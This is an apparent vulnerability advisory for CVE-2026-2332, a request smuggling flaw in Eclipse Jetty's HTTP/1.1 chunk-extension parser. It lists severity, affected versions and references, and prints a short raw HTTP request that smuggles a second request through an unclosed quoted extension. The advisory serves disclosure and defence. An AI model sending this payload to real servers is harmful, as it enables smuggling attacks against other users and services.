# CVE-2026-2332

## Summary

- **CVE ID:** CVE-2026-2332
- **Severity:** HIGH
- **CVSS Score:** 7.4 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)
- **CWE:** CWE-444
- **Published:** Apr 14, 2026
- **Last Modified:** Sep 14, 2026

## Description

In Eclipse Jetty, the HTTP/1.1 parser is vulnerable to request smuggling when chunk extensions are used, similar to the "funky chunks" techniques outlined here:
  *  https://w4ke.info/2025/06/18/funky-chunks.html

  *  https://w4ke.info/2025/10/29/funky-chunks-2.html


Jetty terminates chunk extension parsing at \r\n inside quoted strings instead of treating this as an error.


POST / HTTP/1.1
Host: localhost
Transfer-Encoding: chunked

1;ext="val
X
0

GET /smuggled HTTP/1.1
...





Note how the chunk extension does not close the double quotes, and it is able to inject a smuggled request.

## Affected Products

- Eclipse Foundation — Eclipse Jetty (12.1.0)
- Eclipse Foundation — Eclipse Jetty (12.0.0)
- Eclipse Foundation — Eclipse Jetty (11.0.0)
- Eclipse Foundation — Eclipse Jetty (10.0.0)
- Eclipse Foundation — Eclipse Jetty (9.4.0)

## References

- [CNA](https://github.com/jetty/jetty.project/security/advisories/GHSA-355h-qmc2-wpwf)
- [CNA](https://gitlab.eclipse.org/security/cve-assignment/-/issues/89)
- [redhat-SADP](https://access.redhat.com/security/cve/CVE-2026-2332)
- [redhat-SADP](https://bugzilla.redhat.com/show_bug.cgi?id=2458187)
- [redhat-SADP](https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-2332.json)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:20568)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:25089)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:14272)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:22453)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:21773)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:10175)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:17668)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:50223)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:50222)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:50263)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:50221)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:60247)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:60239)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:60251)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:60246)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:60250)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:60259)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:60254)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:60249)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:60248)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:60252)
- [redhat-SADP](https://access.redhat.com/errata/RHSA-2026:60256)

## Exploitation Prediction (EPSS)

- **EPSS Score:** 1.31%
- **EPSS Percentile:** 69.1

---
_Exported from OnDuty AI Vulnerability Intelligence on 2026-09-17._